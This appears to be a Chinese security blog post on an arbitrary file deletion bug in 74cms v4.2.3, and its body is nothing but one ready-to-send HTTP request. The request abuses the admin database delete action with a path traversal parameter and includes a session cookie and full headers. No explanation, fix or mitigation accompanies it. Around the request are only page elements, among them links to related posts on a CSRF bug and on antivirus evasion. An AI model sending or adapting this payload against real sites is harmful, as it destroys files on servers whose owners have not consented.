74cms v4.2.3 任意文件删除

[rihide]
[wm_red]GET /index.php?m=admin&c=database&a=del&name=/../../../../../ HTTP/1.1
Host: 0-sec.org
User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/index.php?m=admin&c=database&a=restore
Connection: close
Cookie: think_template=default; PHPSESSID=6d86a34ec9125b2d08ebbb7630838682; think_language=en
Upgrade-Insecure-Requests: 1[/wm_red]
[/rihide]

给TA买糖
共{{data.count}}人
人已赞赏
Web安全渗透测试

坐下坐下,听我讲免杀抓密码

2019-9-9 10:35:15

Web漏洞

(CVE-2019-11374)74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞

2020-10-16 17:28:03

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索